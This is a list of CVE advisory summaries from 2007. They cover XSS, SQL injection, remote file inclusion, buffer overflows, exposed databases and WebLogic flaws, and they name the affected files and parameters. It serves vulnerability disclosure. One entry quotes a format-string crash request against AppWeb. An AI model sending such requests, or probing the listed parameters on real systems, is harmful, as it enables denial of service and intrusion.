[CVE-2007-3227] Cross-site scripting (XSS) vulnerability in the to_json (ActiveRecord::Base#to_json) function in Ruby on Rails before edge 9606 allows remote attackers to inject arbitrary web script via the input values.
[CVE-2007-3226] Cross-site scripting (XSS) vulnerability in dotProject before 2.1 RC2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2006-2851 and CVE-2006-3240.
[CVE-2007-3218] Cross-site scripting (XSS) vulnerability in request.php in PHP Live! 3.2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the pagex parameter.
[CVE-2007-3213] Multiple cross-site scripting (XSS) vulnerabilities in comments.cgi in Sporum Forum 3.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) view and (2) mode parameters.
[CVE-2007-3212] Multiple cross-site scripting (XSS) vulnerabilities in links.php in Beehive Forum 0.7.1 allow remote attackers to inject arbitrary web script or HTML via the (1) viewmode, (2) fid, and (3) sort_dir parameters, different vectors than CVE-2005-4460.
[CVE-2007-3211] Cross-site scripting (XSS) vulnerability in 404.php in Domain Technologie Control (DTC) before 0.25.9 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (REQUEST_URI). NOTE: the provenance of this information is unknown.
[CVE-2007-3202] Cross-site scripting (XSS) vulnerability in the rich text editor in Webwiz allows remote attackers to inject arbitrary web script or HTML via URL-encoded HTML composed of a frameset in which a frame has a SRC attribute pointing to a JavaScript document.
[CVE-2007-3198] Cross-site scripting (XSS) vulnerability in comments.php in Maran PHP Blog (Maran Blog), possibly only versions before 20070610, allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2007-3195] Cross-site scripting (XSS) vulnerability in index.php in ERFAN WIKI 1.00 allows remote attackers to inject arbitrary web script or HTML via the title parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-3189] Cross-site scripting (XSS) vulnerability in auth.php in Just For Fun Network Management System (JFFNMS) 0.8.3 allows remote attackers to inject arbitrary web script or HTML via the user parameter.
[CVE-2007-3182] Multiple cross-site scripting (XSS) vulnerabilities in Calendarix 0.7.20070307, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) year and (2) month parameters to calendar.php, and the (3) leftfooter parameter to cal_footer.inc.php. NOTE: the ycyear parameter to yearcal.php is already covered by CVE-2006-1835.
[CVE-2007-3178] Multiple SQL injection vulnerabilities in Zindizayn Okul Web Sistemi 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) id or (2) pass parameter to (a) mezungiris.asp or (b) ogretmenkontrol.asp.
[CVE-2007-3174] Cross-site scripting (XSS) vulnerability in auth.w2b in W2B Online Banking allows remote attackers to inject arbitrary web script or HTML via the adtype parameter, a different vector than CVE-2006-1980.
[CVE-2007-3172] Directory traversal vulnerability in demo/pop3/error.php in Uebimiau Webmail allows remote attackers to determine the existence of arbitrary directories via an absolute pathname and .. (dot dot) in the selected_theme parameter.
[CVE-2007-3171] Uebimiau Webmail allows remote attackers to obtain sensitive information via a request to demo/pop3/error.php with an invalid value of the (1) smarty or (2) selected_theme parameter, which reveals the path in various error messages.
[CVE-2007-3170] Multiple cross-site scripting (XSS) vulnerabilities in Uebimiau Webmail allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO to redirect.php or (2) the selected_theme parameter to demo/pop3/error.php.
[CVE-2007-3164] Microsoft Internet Explorer 7, when prompting for HTTP Basic Authentication for an IDN web site, uses ACE labels for the domain name in the status bar, but uses internationalized labels for this name in the authentication dialog, which might allow remote attackers to perform phishing attacks if the user misinterprets confusable characters in the internationalized labels, as demonstrated by displaying xn--theshmogroup-bgk.com only in the status bar.
[CVE-2007-3159] http.c in MiniWeb Http Server 0.8.x allows remote attackers to cause a denial of service (application crash) via a negative value in the Content-Length HTTP header.
[CVE-2007-3156] Multiple cross-site scripting (XSS) vulnerabilities in pam_login.cgi in Webmin before 1.350 and Usermin before 1.280 allow remote attackers to inject arbitrary web script or HTML via the (1) cid, (2) message, or (3) question parameter. NOTE: some of these details are obtained from third party information.
[CVE-2007-3148] Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.
[CVE-2007-3147] Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information.
[CVE-2007-3146] Zen Help Desk 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing a password via a direct request for ZenHelpDesk.mdb.
[CVE-2007-3141] PHP remote file inclusion vulnerability in core/editor.php in phpWebThings 1.5.2 allows remote attackers to execute arbitrary PHP code via a URL in the editor_insert_top parameter. NOTE: the editor_insert_bottom vector is already covered by CVE-2006-6042.
[CVE-2007-3137] Multiple cross-site scripting (XSS) vulnerabilities in 4print.asp in WmsCMS 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) sbl, (2) sbr, or (3) search parameter. NOTE: the original disclosure claims the pageid parameter in index.php is affected, but this is incorrect.
[CVE-2007-3135] Cross-site scripting (XSS) vulnerability in atomPhotoBlog.php in Atom Photoblog 1.0.9 and earlier allows remote attackers to inject arbitrary web script or HTML via the tag parameter.
[CVE-2007-3134] Multiple cross-site scripting (XSS) vulnerabilities in atomPhotoBlog.php in Atom PhotoBlog 1.0.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) Your Name, (2) Your Homepage, and (3) Your Comment fields, when using "Approve Comments."
[CVE-2007-3133] SQL injection vulnerability in urunbak.asp in W1L3D4 WEBmarket 0.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2007-3131] Cross-site scripting (XSS) vulnerability in add_comment.php in Light Blog 4.1 before 20070606 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2007-3129] Cross-site scripting (XSS) vulnerability in login.php in Utopia News Pro 1.4.0 allows remote attackers to inject arbitrary web script or HTML via the password parameter.
[CVE-2007-3120] Cross-site scripting (XSS) vulnerability in public/code/cp_dpage.php in All In One Control Panel (AIOCP) before 1.3.017 allows remote attackers to inject arbitrary web script or HTML via the aiocp_dp parameter. NOTE: some of these details are obtained from third party information.
[CVE-2007-3117] Cross-site scripting (XSS) vulnerability in the SEO module in ADPLAN 3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to HTTP headers.
[CVE-2007-3110] Cross-site scripting (XSS) vulnerability in the Andy Frank Beatnik 1.0 extension for Firefox allows remote attackers to inject arbitrary web script or HTML via an RSS feed. NOTE: the provenance of this information is unknown.
[CVE-2007-3109] The CERN Image Map Dispatcher (htimage.exe) in Microsoft FrontPage allows remote attackers to determine the existence, and possibly partial contents, of arbitrary files under the web root via a relative pathname in the PATH_INFO.
[CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
[CVE-2007-3099] usr/mgmt_ipc.c in iscsid in open-iscsi (iscsi-initiator-utils) before 2.0-865 checks the client's UID on the listening AF_LOCAL socket instead of the new connection, which allows remote attackers to access the management interface and cause a denial of service (iscsid exit or iSCSI connection loss).
[CVE-2007-3084] PHP remote file inclusion vulnerability in sampleblogger.php in Comdev Web Blogger 4.1 allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter, a different vector than CVE-2006-5441.
[CVE-2007-3083] Z-Blog 1.7 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for zblog.mdb.
[CVE-2007-3078] Multiple cross-site scripting (XSS) vulnerabilities in Aigaion before 1.3.3 allow remote attackers to inject arbitrary web script or HTML via the title parameter (Authors and Publication titles) to (1) authoractions.php or (2) publicationactions.php.
[CVE-2007-3071] Buffer overflow in the GetWebStoreURL function in a certain ActiveX control in eSellerateControl365.dll 3.6.5.0 in eSellerate SDK allows user-assisted remote attackers to execute arbitrary code via a long first argument.
[CVE-2007-3070] Cross-site scripting (XSS) vulnerability in index.php in BDigital Web Solutions WebStudio allows remote attackers to inject arbitrary web script or HTML via the pageid parameter.
[CVE-2007-3067] Cross-site scripting (XSS) vulnerability in the Attunement and Key Tracker 0.95 and earlier plugin for EQdkp allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving the (1) keyshow, (2) sortkey, and (3) show parameters to index.php.
[CVE-2007-3064] Cross-site scripting (XSS) vulnerability in diary.php in My Databook allows remote attackers to inject arbitrary web script or HTML via the year parameter.
[CVE-2007-3062] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 2.1.2 running on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-3061] Cactushop 6 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) cactushop6.mdb or (2) cactushop5.mdb.
[CVE-2007-3060] Multiple cross-site scripting (XSS) vulnerabilities in PHP Live! 3.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) sid parameter to (a) chat.php, (2) LANG[DEFAULT_BRANDING] and (3) PHPLIVE_VERSION parameters to (b) help.php, the (4) admin[name] parameter to (c) admin/header.php, and the (5) BASE_URL parameter to (d) super/info.php, and in some cases, the LANG[DEFAULT_BRANDING], PHPLIVE_VERSION, and (6) nav_line parameters to setup/footer.php, different vectors than CVE-2006-6769.
[CVE-2007-3058] Multiple PHP remote file inclusion vulnerabilities in Madirish Webmail 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[basedir] parameter to (1) calendar.php, (2) compose.php, and (3) index.php, different vectors than CVE-2007-2826. NOTE: the provenance of this information is unknown.
[CVE-2007-3056] Cross-site scripting (XSS) vulnerability in filedetails.php in WebSVN 2.0rc4, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the path parameter.
[CVE-2007-3055] Cross-site scripting (XSS) vulnerability in index.php in Codelib Linker 2.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2007-3054] Cross-site scripting (XSS) vulnerability in search.php in Codelib Linker 2.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the kword parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-3053] Session fixation vulnerability in Calimero.CMS 3.3.1232 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
[CVE-2007-3050] Session fixation vulnerability in chameleon cms 3.0 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
[CVE-2007-3049] Cross-site scripting (XSS) vulnerability in index.php in Buttercup web file manager (BWFM) May 2007 allows remote attackers to inject arbitrary web script or HTML via the title parameter.
[CVE-2007-3043] Cross-site scripting (XSS) vulnerability in Collaboration - File Sharing 01-20 up to 01-20-/B and 01-30 up to 01-30-/B in Hitachi Groupmax Collaboration Portal up to 07-30-/D, Groupmax Collaboration Web Client - Forum/File Sharing up to 07-30-/C, uCosminexus Collaboration Portal up to 06-30-/D, and uCosminexus Collaboration Portal - Forum/File Sharing up to 06-30-/C on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-3042] Cross-site scripting (XSS) vulnerability in Meneame before 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-3038] The Teredo interface in Microsoft Windows Vista and Vista x64 Edition does not properly handle certain network traffic, which allows remote attackers to bypass firewall blocking rules and obtain sensitive information via crafted IPv6 traffic, aka "Windows Vista Firewall Blocking Rule Information Disclosure Vulnerability."
[CVE-2007-3018] activeWeb contentserver CMS before 5.6.2964 does not limit the file-creation ability of editors who have restricted accounts, which allows these editors to create files in arbitrary directories.
[CVE-2007-3017] The WYSIWYG editor applet in activeWeb contentserver CMS before 5.6.2964 only filters malicious tags from articles sent to admin/applets/wysiwyg/rendereditor.asp, which allows remote authenticated users to inject arbitrary JavaScript via a request to admin/worklist/worklist_edit.asp.
[CVE-2007-3014] Multiple cross-site scripting (XSS) vulnerabilities in activeWeb contentserver before 5.6.2964 allow remote attackers to inject arbitrary web script or HTML via the msg parameter to (1) errors/rights.asp or (2) errors/transaction.asp, or (3) the name of a MIME type (mimetype).
[CVE-2007-3013] SQL injection vulnerability in activeWeb contentserver before 5.6.2964 allows remote authenticated users with edit permission to execute arbitrary SQL commands via the id parameter to admin/picture/picture_real_edit.asp, and probably other unspecified vectors.
[CVE-2007-3009] Format string vulnerability in the MprLogToFile::logEvent function in Mbedthis AppWeb 2.0.5-4, when the build supports logging but the configuration disables logging, allows remote attackers to cause a denial of service (daemon crash) via format string specifiers in the HTTP scheme, as demonstrated by a "GET %n://localhost:80/" request.
[CVE-2007-3008] Mbedthis AppWeb before 2.2.2 enables the HTTP TRACE method, which has unspecified impact probably related to remote information leaks and cross-site tracing (XST) attacks, a related issue to CVE-2004-2320 and CVE-2005-3398.
[CVE-2007-3001] Multiple cross-site scripting (XSS) vulnerabilities in PHP JackKnife (PHPJK) allow remote attackers to inject arbitrary web script or HTML via (1) the sUName parameter to UserArea/Authenticate.php, (2) the sAccountUnq parameter to UserArea/NewAccounts/index.php, or the (3) iCategoryUnq, (4) iDBLoc, (5) iTtlNumItems, (6) iNumPerPage, or (7) sSort parameter to G_Display.php, different vectors than CVE-2005-4239.
[CVE-2007-2997] ** DISPUTED ** Multiple SQL injection vulnerabilities in cgi-bin/reorder2.asp in SalesCart Shopping Cart allow remote attackers to execute arbitrary SQL commands via the password field and other unspecified vectors. NOTE: the vendor disputes this issue, stating "We were able to reproduce this sql injection on an old out-of-date demo on the website but not on the released product."
[CVE-2007-2995] Unspecified vulnerability in sysmgt.websm.rte in IBM AIX 5.2.0 and 5.3.0 has unknown impact and attack vectors.
[CVE-2007-2993] Multiple cross-site scripting (XSS) vulnerabilities in OmegaMw7.asp in OMEGA (aka Omegasoft) INterneSErvicesLosungen (INSEL) allow remote attackers to inject arbitrary web script or HTML via (1) user-created text fields
[CVE-2007-2991] Cross-site scripting (XSS) vulnerability in includes/send.inc.php in Evenzia CMS allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2007-2988] A certain admin script in Inout Meta Search Engine sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to inject arbitrary PHP code, as demonstrated by a request to admin/create_engine.php followed by a request to admin/generate_tabs.php.
[CVE-2007-2983] Multiple buffer overflows in the British Telecommunications Consumer webhelper ActiveX control before 2.0.0.8 in btwebcontrol.dll allow remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2007-2982] Multiple buffer overflows in the British Telecommunications Business Connect webhelper ActiveX control before 1.0.0.7 in btbconnectwebcontrol.dll allow remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2007-2979] Techno Dreams Web Directory / Search Engine 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for Database.mdb.
[CVE-2007-2978] Session fixation vulnerability in eggblog 3.1.0 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
[CVE-2007-2975] The admin console in Ignite Realtime Openfire 3.3.0 and earlier (formerly Wildfire) does not properly specify a filter mapping in web.xml, which allows remote attackers to gain privileges and execute arbitrary code by accessing functionality that is exposed through DWR, as demonstrated using the downloader.
[CVE-2007-2970] Multiple cross-site scripting (XSS) vulnerabilities in cgi/block.cgi in 8e6 R3000 Internet Filter allow remote attackers to inject arbitrary web script or HTML via the (1) URL, (2) CAT, and (3) USER parameters. NOTE: the provenance of this information is unknown.
[CVE-2007-2968] Cross-site scripting (XSS) vulnerability in register.php in cpCommerce 1.1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the name parameter (Full Name field).
[CVE-2007-2963] Multiple cross-site scripting (XSS) vulnerabilities in Invision Power Board (IPB or IP.Board) 2.2.2, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via (1) module_bbcodeloader.php, (2) module_div.php, (3) module_email.php, (4) module_image.php, (5) module_link.php, or (6) the editorid parameter to module_table.php in jscripts/folder_rte_files/. NOTE: some details were obtained from third party sources.
[CVE-2007-2962] Cross-site scripting (XSS) vulnerability in search.php in Particle Gallery 1.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the order parameter.
[CVE-2007-2945] RMForum stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for rmforum.mdb.
[CVE-2007-2944] WabCMS 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/wabcmsn.mdb. NOTE: this issue was originally reported for "webCMS," but this was an error by an unreliable researcher.
[CVE-2007-2943] PHP remote file inclusion vulnerability in class/class.php in Webavis 0.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the root parameter.
[CVE-2007-2932] Cross-site scripting (XSS) vulnerability in index.php in BoastMachine allows remote attackers to inject arbitrary web script or HTML via the blog parameter in a content search action.
[CVE-2007-2931] Heap-based buffer overflow in Microsoft MSN Messenger 6.2, 7.0, and 7.5, and Live Messenger 8.0 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving video conversation handling in Web Cam and video chat sessions.
[CVE-2007-2929] The IBM Lenovo Access Support acpRunner ActiveX control, as distributed in acpcontroller.dll before 1.2.8.0 and possibly acpir.dll before 1.0.0.9 (Automated Solutions 1.0 before fix pack 1), exposes unsafe methods to arbitrary web domains, which allows remote attackers to download arbitrary code onto a client system and execute this code.
[CVE-2007-2918] Multiple stack-based buffer overflows in ActiveX controls (1) VibeC in (a) vibecontrol.dll, (2) CallManager and (3) ViewerClient in (b) StarClient.dll, (4) ComLink in (c) uicomlink.dll, and (5) WebCamXMP in (d) wcamxmp.dll in Logitech VideoCall allow remote attackers to cause a denial of service (browser crash) and execute arbitrary code via unspecified vectors.
[CVE-2007-2916] Cross-site scripting (XSS) vulnerability in showown.php in GMTT Music Distro 1.2 allows remote attackers to inject arbitrary web script or HTML via the st parameter.
[CVE-2007-2915] Cross-site scripting (XSS) vulnerability in RM EasyMail Plus allows remote attackers to inject arbitrary web script or HTML via the title field in an email.
[CVE-2007-2914] Multiple cross-site scripting (XSS) vulnerabilities in PsychoStats 3.0.6b allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) awards.php, (2) login.php, (3) register.php, (4) weapons.php, and possibly other unspecified files.
[CVE-2007-2913] Cross-site scripting (XSS) vulnerability in index.php in ClonusWiki .5 allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2007-2910] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin before 3.6.7 PL1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to the vb_367_xss_fix_plugin.xml update, a related issue to CVE-2007-2909.
[CVE-2007-2909] Cross-site scripting (XSS) vulnerability in calendar.php in Jelsoft vBulletin 3.6.x before 3.6.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to the vb_calendar366_xss_fix_plugin.xml update.
[CVE-2007-2908] Cross-site scripting (XSS) vulnerability in calendar.php in Jelsoft vBulletin before 3.6.6 allows remote attackers to inject arbitrary web script or HTML via the title field in a single add action.
[CVE-2007-2904] Cross-site scripting (XSS) vulnerability in Sun Java System Messaging Server 6.0 through 6.3, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly a related issue to CVE-2006-5653.
[CVE-2007-2901] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the img parameter to main/inc/lib/fckeditor/editor/plugins/ImageManager/editor.php and other unspecified vectors.
[CVE-2007-2892] Cross-site scripting (XSS) vulnerability in news.asp in ASP-Nuke 2.0.7 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-2887] Cross-site scripting (XSS) vulnerability in index.php in Web Icerik Yonetim Sistemi (WIYS) 1.0 allows remote attackers to inject arbitrary web script or HTML via the No parameter in the Sayfa page.
[CVE-2007-2881] Multiple stack-based buffer overflows in the SOCKS proxy support (sockd) in Sun Java Web Proxy Server before 4.0.5 allow remote attackers to execute arbitrary code via crafted packets during protocol negotiation.
[CVE-2007-2880] Multiple cross-site scripting (XSS) vulnerabilities in Digirez 3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) Room_name parameter to room/info_book.asp or the (2) curYear parameter to room/week.asp.
[CVE-2007-2879] Cross-site scripting (XSS) vulnerability in mods.php in GTP GNUTurk Portal System 3G allows remote attackers to inject arbitrary web script or HTML via the month parameter.
[CVE-2007-2865] Cross-site scripting (XSS) vulnerability in sqledit.php in phpPgAdmin 4.1.1 allows remote attackers to inject arbitrary web script or HTML via the server parameter.
[CVE-2007-2847] Multiple cross-site scripting (XSS) vulnerabilities in hlstats.php in HLstats 1.35, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) authusername or (2) authpassword parameter, different vectors than CVE-2007-0840 and CVE-2007-2812.
[CVE-2007-2843] Cross-domain vulnerability in Apple Safari 2.0.4 allows remote attackers to access restricted information from other domains via Javascript, as demonstrated by a js script that accesses the location information of cross-domain web pages, probably involving setTimeout and timed events.
[CVE-2007-2832] Cross-site scripting (XSS) vulnerability in the web application firewall in Cisco CallManager before 3.3(5)sr3, 4.1 before 4.1(3)sr5, 4.2 before 4.2(3)sr2, and 4.3 before 4.3(1)sr1 allows remote attackers to inject arbitrary web script or HTML via the pattern parameter to CCMAdmin/serverlist.asp (aka the search-form) and possibly other unspecified vectors.
[CVE-2007-2826] PHP remote file inclusion vulnerability in lib/addressbook.php in Madirish Webmail 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[basedir] parameter.
[CVE-2007-2825] Multiple cross-site scripting (XSS) vulnerabilities in ReadMsg.php in @Mail 5.02 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) links and (2) images.
[CVE-2007-2819] Cross-site scripting (XSS) vulnerability in reportItem.do in Track+ 3.3.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the projId parameter.
[CVE-2007-2818] Cross-site scripting (XSS) vulnerability in cand_login.asp in CactuSoft Parodia 6.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the strJobIDs parameter.
[CVE-2007-2815] The "hit-highlighting" functionality in webhits.dll in Microsoft Internet Information Services (IIS) Web Server 5.0 only uses Windows NT ACL configuration, which allows remote attackers to bypass NTLM and basic authentication mechanisms and access private web directories via the CiWebhitsfile parameter to null.htw.
[CVE-2007-2812] Cross-site scripting (XSS) vulnerability in hlstats.php in HLstats 1.35, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO or (2) the action parameter.
[CVE-2007-2811] Cross-site scripting (XSS) vulnerability in OSK Advance-Flow 4.41 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-2808] Cross-site scripting (XSS) vulnerability in gnatsweb.pl in Gnatsweb 4.00 and Gnats 4.1.99 allows remote attackers to inject arbitrary web script or HTML via the database parameter.
[CVE-2007-2806] Multiple cross-site scripting (XSS) vulnerabilities in index.php in GaliX 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) galix_cat_detail, (2) galix_gal_detail, and (3) galix_cat_detail_sort parameters.
[CVE-2007-2805] Multiple cross-site scripting (XSS) vulnerabilities in index.php in ClientExec (CE) 3.0 beta2, and possibly other versions, allow remote attackers to inject arbitrary web script or HTML via the (1) ticketID, (2) view, and (3) fuse parameters.
[CVE-2007-2804] Multiple cross-site scripting (XSS) vulnerabilities in scripts/prodList.asp in CandyPress Store 3.5.2.14 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) brand and (2) Msg parameters.
[CVE-2007-2802] Cross-site scripting (XSS) vulnerability in cp/ps/Main/login/Login in RM EasyMail Plus allows remote attackers to inject arbitrary web script or HTML via the d parameter.
[CVE-2007-2801] Multiple cross-site scripting (XSS) vulnerabilities in open.php in eTicket 1.5.5 and 1.5.5.1, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) err and (2) warn parameters. NOTE: the vendor disputes the significance of the issue, stating that "eTicket is not designed to work with register_globals On."
[CVE-2007-2790] Cross-site scripting (XSS) vulnerability in shopcontent.asp in VP-ASP Shopping Cart 6.50, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the type parameter.
[CVE-2007-2781] Cross-site scripting (XSS) vulnerability in include/sessionRegister.php in WikyBlog before 1.4.13 allows remote attackers to inject arbitrary web script or HTML, probably via vectors related to a certain data2 array element.
[CVE-2007-2776] AlstraSoft Template Seller Pro 3.25 and earlier sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to inject a credential variable setting and obtain administrative access via a direct request to admin/changeinfo.php.
[CVE-2007-2775] AlstraSoft Live Support 1.21 sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to obtain administrative access via a direct request to admin/managesettings.php.
[CVE-2007-2757] Multiple cross-site scripting (XSS) vulnerabilities in Redoable 1.2 allow remote attackers to inject arbitrary web script or HTML via the s parameter to (1) wp-content/themes/redoable/searchloop.php or (2) wp-content/themes/redoable/header.php.
[CVE-2007-2753] RunawaySoft Haber portal 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for data/xice.mdb.
[CVE-2007-2747] Directory traversal vulnerability in rdw_helpers.py in rdiffWeb before 0.3.5.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to the /browse URI.
[CVE-2007-2746] The viewList function in lib/WebGUI/Asset/Wobject/DataForm.pm in Plain Black WebGUI before 7.3.14 does not properly use data structures containing privilege information, which allows remote authenticated users to obtain sensitive information or possibly have other unspecified impact.
[CVE-2007-2745] Cross-site scripting (XSS) vulnerability in printcal.pl in vDesk Webmail 4.03 allows remote attackers to inject arbitrary web script or HTML via the type parameter.
[CVE-2007-2739] Cross-site scripting (XSS) vulnerability in xajax before 0.2.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-2733] Unrestricted file upload vulnerability in Jetbox CMS allows remote authenticated users with author privileges to upload arbitrary scripts via unspecified vectors, which can be accessed in webfiles/. NOTE: this issue might be a duplicate of CVE-2004-1448.
[CVE-2007-2732] Multiple cross-site scripting (XSS) vulnerabilities in Jetbox CMS allow remote attackers to inject arbitrary web script or HTML via the (1) path parameter to view/search/
[CVE-2007-2724] Cross-site scripting (XSS) vulnerability in all_photos.html in fotolog allows remote attackers to inject arbitrary web script or HTML via the user parameter.
[CVE-2007-2723] Media Player Classic 6.4.9.0 allows user-assisted remote attackers to cause a denial of service (web browser crash) via an "empty" .MPA file, which triggers a divide-by-zero error.
[CVE-2007-2719] Session fixation vulnerability in HP Systems Insight Manager (SIM) 4.2 and 5.0 SP4 and SP5 allows remote attackers to hijack web sessions by setting the JSESSIONID cookie.
[CVE-2007-2718] Cross-site scripting (XSS) vulnerability in the WebMail system in Stalker CommuniGate Pro 5.1.8 and earlier, when using Microsoft Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via crafted STYLE tags.
[CVE-2007-2716] Multiple cross-site scripting (XSS) vulnerabilities in EQdkp 1.3.2c and earlier allow remote attackers to inject arbitrary web script or HTML via the show parameter to (1) listmembers.php and (2) stats.php. NOTE: some of these details are obtained from third party information.
[CVE-2007-2713] ifdate 2.x sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to obtain administrative access via a direct request for the admin/ URI.
[CVE-2007-2705] Directory traversal vulnerability in the Test View Console in BEA WebLogic Integration 9.2 before SP1 and WebLogic Workshop 8.1 SP2 through SP6, when "deployed in an exploded format," allows remote attackers to list a WebLogic Workshop Directory (wlwdir) parent directory via unspecified vectors.
[CVE-2007-2704] BEA WebLogic Server 9.0 through 9.2 allows remote attackers to cause a denial of service (SSL port unavailability) by accessing a half-closed SSL socket.
[CVE-2007-2703] BEA WebLogic Portal 9.2 GA can corrupt a visitor entitlements role if an administrator provides a long role description, which might allow remote authenticated users to access privileged resources.
[CVE-2007-2702] Cross-site scripting (XSS) vulnerability in the GroupSpace application in BEA WebLogic Portal 9.2 GA allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors related to the rich text editor.
[CVE-2007-2701] The JMS Message Bridge in BEA WebLogic Server 7.0 through SP7 and 8.1 through Service Pack 6, when configured without a username and password, or when the connection URL is not defined, allows remote attackers to bypass the security access policy and "send unauthorized messages to a protected queue."
[CVE-2007-2700] The WLST script generated by the configToScript command in BEA WebLogic Express and WebLogic Server 9.0 and 9.1 does not encrypt certain attributes in configuration files when creating a new domain, which allows remote authenticated users to obtain sensitive information.
[CVE-2007-2699] The Administration Console in BEA WebLogic Express and WebLogic Server 9.0 and 9.1 does not properly enforce certain Domain Security Policies, which allows remote administrative users in the Deployer role to upload arbitrary files.
[CVE-2007-2698] The Administration Console in BEA WebLogic Server 9.0 may show plaintext Web Service attributes during configuration creation, which allows remote attackers to obtain sensitive credential information.
[CVE-2007-2697] The embedded LDAP server in BEA WebLogic Express and WebLogic Server 7.0 through SP6, 8.1 through SP5, 9.0, and 9.1, when in certain configurations, does not limit or audit failed authentication attempts, which allows remote attackers to more easily conduct brute-force attacks against the administrator password, or flood the server with login attempts and cause a denial of service.
[CVE-2007-2696] The JMS Server in BEA WebLogic Server 6.1 through SP7, 7.0 through SP6, and 8.1 through SP5 enforces security access policies on the front end, which allows remote attackers to access protected queues via direct requests to the JMS back-end server.
[CVE-2007-2695] The HttpClusterServlet and HttpProxyServlet in BEA WebLogic Express and WebLogic Server 6.1 through SP7, 7.0 through SP7, 8.1 through SP5, 9.0, and 9.1, when SecureProxy is enabled, may process "external requests on behalf of a system identity," which allows remote attackers to access administrative data or functionality.
